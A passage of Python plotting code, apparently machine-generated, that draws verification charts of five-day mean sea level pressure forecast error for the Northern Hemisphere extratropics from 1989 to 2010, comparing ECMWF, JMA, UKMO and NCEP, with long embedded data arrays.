mpp.reset('graph_line_thickness')
# Page-geometry queries; trailing comments are the generator's observed values.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','evergreen')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', 
'2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
# Same missing-data handling as the previous curves: ignore the 1.70e+38
# sentinel points and plot symbols at the valid ones.
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 7.70000000e+00, 8.40000000e+00, 7.40000000e+00,
7.00000000e+00, 5.80000000e+00, 5.30000000e+00,
4.90000000e+00, 5.20000000e+00, 6.00000000e+00,
6.90000000e+00, 7.40000000e+00, 7.60000000e+00,
7.40000000e+00, 6.90000000e+00, 7.40000000e+00,
6.70000000e+00, 5.90000000e+00, 5.20000000e+00,
4.80000000e+00, 4.90000000e+00, 5.90000000e+00,
6.70000000e+00, 7.50000000e+00, 7.90000000e+00,
7.80000000e+00, 7.60000000e+00, 7.10000000e+00,
6.70000000e+00, 5.80000000e+00, 5.30000000e+00,
4.60000000e+00, 5.00000000e+00, 5.60000000e+00,
6.70000000e+00, 7.10000000e+00, 8.10000000e+00,
7.30000000e+00, 7.60000000e+00, 7.20000000e+00,
6.60000000e+00, 5.60000000e+00, 5.10000000e+00,
4.70000000e+00, 4.80000000e+00, 6.30000000e+00,
6.30000000e+00, 7.10000000e+00, 7.80000000e+00,
7.90000000e+00, 7.80000000e+00, 7.90000000e+00,
6.40000000e+00, 5.70000000e+00, 4.90000000e+00,
4.60000000e+00, 4.50000000e+00, 5.70000000e+00,
6.50000000e+00, 7.10000000e+00, 7.80000000e+00,
7.50000000e+00, 8.00000000e+00, 7.10000000e+00,
6.60000000e+00, 5.70000000e+00, 5.10000000e+00,
4.80000000e+00, 4.40000000e+00, 5.50000000e+00,
6.40000000e+00, 7.30000000e+00, 7.70000000e+00,
7.70000000e+00, 7.40000000e+00, 8.00000000e+00,
6.60000000e+00, 5.40000000e+00, 5.20000000e+00,
4.30000000e+00, 4.50000000e+00, 5.60000000e+00,
6.60000000e+00, 7.30000000e+00, 6.30000000e+00,
7.30000000e+00, 7.10000000e+00, 6.60000000e+00,
5.70000000e+00, 5.40000000e+00, 4.50000000e+00,
4.30000000e+00, 4.40000000e+00, 5.40000000e+00,
6.10000000e+00, 7.60000000e+00, 7.20000000e+00,
7.30000000e+00, 6.80000000e+00, 7.10000000e+00,
6.30000000e+00, 5.40000000e+00, 5.10000000e+00,
4.20000000e+00, 4.80000000e+00, 5.30000000e+00,
6.60000000e+00, 6.80000000e+00, 6.90000000e+00,
6.80000000e+00, 6.60000000e+00, 6.80000000e+00,
6.10000000e+00, 5.30000000e+00, 4.80000000e+00,
4.60000000e+00, 4.80000000e+00, 6.20000000e+00,
6.20000000e+00, 6.10000000e+00, 7.20000000e+00,
7.20000000e+00, 7.30000000e+00, 6.40000000e+00,
5.70000000e+00, 5.30000000e+00, 4.80000000e+00,
4.40000000e+00, 4.40000000e+00, 5.30000000e+00,
5.80000000e+00, 6.90000000e+00, 6.60000000e+00,
7.20000000e+00, 6.50000000e+00, 6.30000000e+00,
5.80000000e+00, 5.20000000e+00, 4.80000000e+00,
4.30000000e+00, 4.30000000e+00, 1.70000000e+38,
5.70000000e+00, 6.00000000e+00, 6.70000000e+00,
6.30000000e+00, 7.00000000e+00, 6.10000000e+00,
6.20000000e+00, 5.10000000e+00, 4.10000000e+00,
3.80000000e+00, 3.80000000e+00, 4.70000000e+00,
5.30000000e+00, 5.90000000e+00, 6.20000000e+00,
6.10000000e+00, 6.40000000e+00, 6.20000000e+00,
5.70000000e+00, 4.60000000e+00, 1.70000000e+38,
4.00000000e+00, 3.80000000e+00, 4.90000000e+00,
5.40000000e+00, 5.60000000e+00, 6.40000000e+00,
6.30000000e+00, 6.20000000e+00, 6.00000000e+00,
5.20000000e+00, 4.60000000e+00, 3.90000000e+00,
3.60000000e+00, 3.80000000e+00, 5.00000000e+00,
5.70000000e+00, 5.90000000e+00, 6.20000000e+00,
6.40000000e+00, 6.20000000e+00, 6.20000000e+00,
5.00000000e+00, 4.50000000e+00, 4.00000000e+00,
3.40000000e+00, 3.80000000e+00, 4.60000000e+00,
5.30000000e+00, 5.80000000e+00, 6.40000000e+00,
6.20000000e+00, 6.30000000e+00, 5.60000000e+00,
5.00000000e+00, 4.40000000e+00, 3.80000000e+00,
3.40000000e+00, 3.60000000e+00, 4.60000000e+00,
5.00000000e+00, 5.30000000e+00, 5.50000000e+00,
5.40000000e+00, 5.50000000e+00, 5.50000000e+00,
4.60000000e+00, 4.10000000e+00, 3.60000000e+00,
3.60000000e+00, 3.30000000e+00, 4.50000000e+00,
4.80000000e+00, 5.60000000e+00, 5.50000000e+00,
5.30000000e+00, 5.60000000e+00, 5.10000000e+00,
4.60000000e+00, 4.30000000e+00, 3.70000000e+00,
3.10000000e+00, 3.60000000e+00, 3.90000000e+00,
4.80000000e+00, 5.30000000e+00, 5.50000000e+00,
5.20000000e+00, 5.40000000e+00, 5.20000000e+00,
4.70000000e+00, 4.10000000e+00, 3.90000000e+00,
3.50000000e+00, 3.60000000e+00, 4.00000000e+00,
5.00000000e+00, 5.10000000e+00, 5.80000000e+00,
5.20000000e+00, 5.00000000e+00, 5.50000000e+00,
4.40000000e+00, 4.20000000e+00, 3.60000000e+00,
3.60000000e+00, 3.80000000e+00, 4.00000000e+00,
4.80000000e+00, 5.10000000e+00, 5.50000000e+00,
5.30000000e+00, 5.20000000e+00, 5.00000000e+00,
4.90000000e+00, 3.90000000e+00, 3.60000000e+00,
3.60000000e+00, 3.30000000e+00, 3.80000000e+00,
4.30000000e+00, 5.10000000e+00, 5.00000000e+00])) #264
# Styling for the third curve: chain-dashed evergreen line, marker index 6
# (distinguished from the previous evergreen curve by line style and marker).
mpp.setc('graph_missing_data_colour','evergreen')
mpp.seti('graph_symbol_marker_index',6)
mpp.setc('graph_symbol_colour','evergreen')
mpp.setc('graph_missing_data_style','chain_dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','chain_dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
# Draw the curve using all graph_* parameters set above.
mpp.graph()
# Reset all curve parameters back to defaults.
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
# Page-geometry queries; trailing comments are the generator's observed values.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Start a fresh super page for the next plot panel. Output file base name is
# 'verify'; geometry is 29.7 x 21.0 (presumably cm, A4 landscape — confirm).
mpp.setc('output_name','verify')
mpp.setc('subpage_map_projection','none')
mpp.setc('subpage_map_projection','none')
mpp.new_page('SUPER_PAGE')
mpp.setr('page_x_length',29.7)
mpp.setr('page_y_length',21.0)
mpp.setr('super_page_x_length',29.7)
mpp.setc('page_id_line','off')
mpp.setc('page_id_line_user_text','Verify/MetPy devel')
mpp.setc('page_frame','on')
mpp.setr('super_page_y_length',21.0)
mpp.setr('page_x_length',29.7)
mpp.setc('layout','positional')
mpp.setr('page_x_position',0.0)
mpp.setr('page_y_position',0.0)
mpp.setr('page_y_length',21.0)
# Clear any legend configuration left over from the previous page.
mpp.reset('legend_box_x_position')
mpp.reset('legend_box_blanking')
mpp.reset('legend_text_composition')
mpp.reset('legend_box_y_position')
mpp.reset('legend_box_x_length')
mpp.reset('legend_user_lines')
mpp.reset('legend_column_count')
mpp.reset('legend_text_font_size')
mpp.reset('legend_box_mode')
mpp.reset('legend_text_colour')
mpp.reset('legend_box_y_length')
mpp.reset('legend')
mpp.reset('legend_entry_plot_direction')
mpp.setc('page_frame','off')
# Page-geometry queries; trailing comments are the generator's observed values.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Positional title text box for this panel. The text lines use the Magics
# HTML-like markup (font size/bold tags); text_html='on' enables parsing it.
mpp.setr('text_box_x_length',20.879099999999998)
mpp.setr('text_box_x_position',2.0344500000000005)
mpp.setr('text_box_y_length',5.586)
mpp.setc('subpage_frame','off')
mpp.setr('text_box_y_position',15.056999999999999)
mpp.setc('text_mode','positional')
mpp.setr('text_font_size',0.6)
mpp.setc('text_justification','left')
mpp.set1c('text_lines',['<font size="0.72"><b> </b></font>', ' <font size="0.54">Mean sea level pressure</font>', ' <font size="0.54">Root mean square error</font>', ' <font size="0.54">NHem Extratropics <font size=\'0.36\'>(lat 20.0 to 90.0, lon -180.0 to 180.0)</font></font>', ' <font size="0.54">T+120 </font>', ' <font size="0.36">wmo_an od 0001 | 00UTC,verifying</font>'])
mpp.seti('text_line_count',6)
mpp.setc('text_html','on')
mpp.setc('text_colour','black')
# Render the text box with the parameters above.
mpp.text()
# Reset all text parameters back to defaults.
mpp.reset('text_mode')
mpp.reset('text_font_size')
mpp.reset('text_justification')
mpp.reset('text_lines')
mpp.reset('text_line_count')
mpp.reset('text_html')
mpp.reset('text_colour')
mpp.reset('text_box_x_length')
mpp.reset('text_box_x_position')
mpp.reset('text_box_y_length')
mpp.reset('subpage_frame')
mpp.reset('text_box_y_position')
# Page-geometry queries; trailing comments are the generator's observed values.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Positionally placed legend with four user-supplied entries, one per centre
# (ECMWF/JMA/UKMO/NCEP), laid out in a single column.
mpp.setr('legend_box_x_position',16.335)
mpp.setc('legend_box_blanking','off')
mpp.setc('legend_text_composition','user_text_only')
mpp.setr('legend_box_y_position',15.120000000000001)
mpp.setr('legend_box_x_length',11.88)
mpp.set1c('legend_user_lines',['ECMWF 12utc T+120', 'JMA 12utc T+120', 'UKMO 12utc T+120', 'NCEP 00utc T+120'])
mpp.seti('legend_column_count',1)
mpp.setr('legend_text_font_size',0.4)
mpp.setc('legend_box_mode','positional')
mpp.setc('legend_text_colour','black')
mpp.setr('legend_box_y_length',3.2)
mpp.setc('legend','on')
mpp.setc('legend_entry_plot_direction','column')
# Page-geometry queries; trailing comments are the generator's observed values.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Subpage (plot area) geometry within the page, positioned explicitly.
mpp.setr('subpage_x_length',25.541999999999998)
mpp.setr('subpage_x_position',2.97)
mpp.setc('layout','positional')
mpp.setr('subpage_y_position',2.3100000000000005)
mpp.setr('subpage_y_length',12.6)
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Horizontal axis: date axis from 1989-01-01 to 2010-12-01, labelled by year
# only (month/day labels off), with a dotted black grid.
mpp.setr('subpage_horizontal_axis_height',1.5)
mpp.setr('axis_tick_interval',1.0)
mpp.setc('axis_months_label','off')
mpp.setc('axis_date_min_value','1989-01-01')
mpp.setc('axis_type','date')
mpp.setc('axis_tick_label_position','inter_tick')
mpp.setc('axis_years_label','on')
mpp.setc('axis_title','off')
mpp.setc('axis_grid','on')
mpp.setr('axis_days_label_height',0.4)
mpp.setr('axis_months_label_height',0.4)
mpp.setc('axis_date_max_value','2010-12-01')
mpp.setc('axis_grid_line_style','dot')
mpp.setc('axis_date_type','years')
mpp.setr('axis_years_label_height',0.4)
mpp.setc('axis_minor_tick','off')
mpp.setc('axis_grid_colour','black')
mpp.setc('axis_days_label','off')
mpp.setc('subpage_map_projection','none')
# Draw the axis with the parameters above.
mpp.axis()
# Reset all axis parameters back to defaults before the vertical axis.
mpp.reset('axis_tick_interval')
mpp.reset('axis_months_label')
mpp.reset('axis_date_min_value')
mpp.reset('axis_type')
mpp.reset('axis_tick_label_position')
mpp.reset('axis_years_label')
mpp.reset('axis_title')
mpp.reset('axis_grid')
mpp.reset('axis_days_label_height')
mpp.reset('axis_months_label_height')
mpp.reset('axis_date_max_value')
mpp.reset('axis_grid_line_style')
mpp.reset('axis_date_type')
mpp.reset('axis_years_label_height')
mpp.reset('axis_minor_tick')
mpp.reset('axis_grid_colour')
mpp.reset('axis_days_label')
# Page-geometry queries; trailing comments are the generator's observed values.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Vertical axis: 3.5 to 7.5 hPa in 0.5 steps, titled 'hPa', dotted black grid.
mpp.setr('subpage_vertical_axis_width',1.5)
mpp.setc('axis_title_text','hPa')
mpp.setr('axis_tick_label_height',0.4)
mpp.setc('axis_orientation','vertical')
mpp.setr('axis_tick_size',0.175)
mpp.setr('axis_tick_interval',0.5)
mpp.setr('axis_title_height',0.4)
mpp.setr('axis_max_value',7.5)
mpp.setc('axis_grid','on')
mpp.setc('axis_grid_line_style','dot')
mpp.setc('axis_grid_colour','black')
mpp.setr('axis_min_value',3.5)
mpp.setc('subpage_map_projection','none')
# Draw the axis with the parameters above.
mpp.axis()
# Reset all axis parameters back to defaults.
mpp.reset('axis_title_text')
mpp.reset('axis_tick_label_height')
mpp.reset('axis_orientation')
mpp.reset('axis_tick_size')
mpp.reset('axis_tick_interval')
mpp.reset('axis_title_height')
mpp.reset('axis_max_value')
mpp.reset('axis_grid')
mpp.reset('axis_grid_line_style')
mpp.reset('axis_grid_colour')
mpp.reset('axis_min_value')
# Page-geometry queries; trailing comments are the generator's observed values.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','red')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', 
'2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
6.47115394e+00, 6.45232516e+00, 6.36749558e+00,
6.43538396e+00, 6.45271261e+00, 6.45271261e+00,
6.45271261e+00, 6.42326501e+00, 6.39778608e+00,
6.39029212e+00, 6.39029212e+00, 6.38083067e+00,
6.37096277e+00, 6.35236177e+00, 6.40800281e+00,
6.32139225e+00, 6.30370262e+00, 6.28165318e+00,
6.26192196e+00, 6.26192196e+00, 6.25573071e+00,
6.25573071e+00, 6.28225013e+00, 6.25413197e+00,
6.28463735e+00, 6.28463735e+00, 6.25573071e+00,
6.22869703e+00, 6.22869703e+00, 6.25859409e+00,
6.29212471e+00, 6.30978077e+00, 6.31591904e+00,
6.33120578e+00, 6.26345219e+00, 6.27269214e+00,
6.21262156e+00, 6.23163970e+00, 6.20369514e+00,
6.23083729e+00, 6.18007551e+00, 6.16468437e+00,
6.13704598e+00, 6.13086454e+00, 6.10054642e+00,
6.04724455e+00, 6.07261613e+00, 6.05364904e+00,
6.01498130e+00, 5.97606336e+00, 6.04545284e+00,
6.01747455e+00, 6.04297112e+00, 6.02038205e+00,
6.01366499e+00, 6.00145816e+00, 5.99569290e+00,
5.98853070e+00, 5.96280136e+00, 5.96280136e+00,
5.99186949e+00, 5.99186949e+00, 5.95112034e+00,
5.95112034e+00, 5.93373126e+00, 5.91199346e+00,
5.90529423e+00, 5.88210563e+00, 5.88798211e+00,
5.88083044e+00, 5.88083044e+00, 5.90035310e+00,
5.81520994e+00, 5.82501788e+00, 5.81492333e+00,
5.80552897e+00, 5.76339021e+00, 5.80918812e+00,
5.77718213e+00, 5.79468147e+00, 5.80079018e+00,
5.82294313e+00, 5.84928771e+00, 5.85932306e+00,
5.92417364e+00, 5.95385029e+00, 5.92501758e+00,
5.91593892e+00, 5.94018799e+00, 5.90980823e+00,
5.94775868e+00, 5.93625864e+00, 5.94859927e+00,
5.93401213e+00, 5.90804536e+00, 5.85021367e+00,
5.82129711e+00, 5.74289416e+00, 5.71430952e+00,
5.70504163e+00, 5.68807232e+00, 5.68052228e+00,
5.66002061e+00, 5.64852488e+00, 5.62923914e+00,
5.63685787e+00, 5.63685787e+00, 5.60862431e+00,
5.58927544e+00, 5.58927544e+00, 5.59888382e+00,
5.57135531e+00, 5.57135531e+00, 5.60297540e+00,
5.60297540e+00, 5.62672196e+00, 5.63301281e+00,
5.62538888e+00, 5.58263677e+00, 5.55547778e+00,
5.50030302e+00, 5.51006655e+00, 5.45351569e+00,
5.43545460e+00, 5.40986753e+00, 5.36159180e+00,
5.36159180e+00, 5.34267411e+00, 5.31703238e+00,
5.28622424e+00, 5.25269772e+00, 5.20768663e+00,
5.18941230e+00, 5.11044682e+00, 5.11044682e+00,
5.05634914e+00, 5.02195181e+00, 4.99824969e+00,
4.96949025e+00, 4.97610959e+00, 4.98272014e+00,
4.98272014e+00, 4.97426712e+00, 4.98338907e+00,
4.98338907e+00, 4.96462486e+00, 4.93558507e+00,
4.97192116e+00, 4.96361763e+00, 4.94115371e+00,
4.92764311e+00, 4.92095858e+00, 4.90773199e+00,
4.89982993e+00, 4.86706619e+00, 4.84853930e+00,
4.84853930e+00, 4.82994134e+00, 4.78356562e+00,
4.75499737e+00, 4.71407467e+00, 4.71407467e+00,
4.70062053e+00, 4.66815452e+00, 4.66145542e+00,
4.65331423e+00, 4.68757222e+00, 4.65116473e+00,
4.60298816e+00, 4.60298816e+00, 4.57602448e+00,
4.53872229e+00, 4.53872229e+00, 4.52327315e+00,
4.53017660e+00, 4.50656928e+00, 4.49981481e+00,
4.48348823e+00, 4.47427834e+00, 4.47427834e+00,
4.49360657e+00, 4.46486282e+00, 4.48311648e+00,
4.48311648e+00, 4.47502328e+00, 4.46010090e+00,
4.45308882e+00, 4.47073819e+00, 4.45767129e+00,
4.45767129e+00, 4.45767129e+00, 4.46691542e+00,
4.43799880e+00, 4.44747119e+00, 4.47632662e+00,
4.46728851e+00, 4.45935347e+00, 4.45215304e+00,
4.43217403e+00, 4.44494094e+00, 4.42662400e+00,
4.41861592e+00, 4.39165876e+00, 4.38225589e+00,
4.39184851e+00, 4.36358033e+00, 4.31508980e+00,
4.28806483e+00, 4.28806483e+00, 4.28806483e+00,
4.28154956e+00, 4.24980392e+00, 4.26887963e+00,
4.24509521e+00, 4.21040378e+00, 4.18210473e+00,
4.14286535e+00, 4.13329973e+00, 4.14306650e+00,
4.12532827e+00, 4.12532827e+00, 4.11035278e+00,
4.11035278e+00, 4.11035278e+00, 4.08431961e+00,
4.06130111e+00, 4.07890917e+00, 4.04279194e+00,
4.07267316e+00, 4.04464667e+00, 4.02481884e+00,
4.08156424e+00, 4.04876524e+00, 4.06396768e+00,
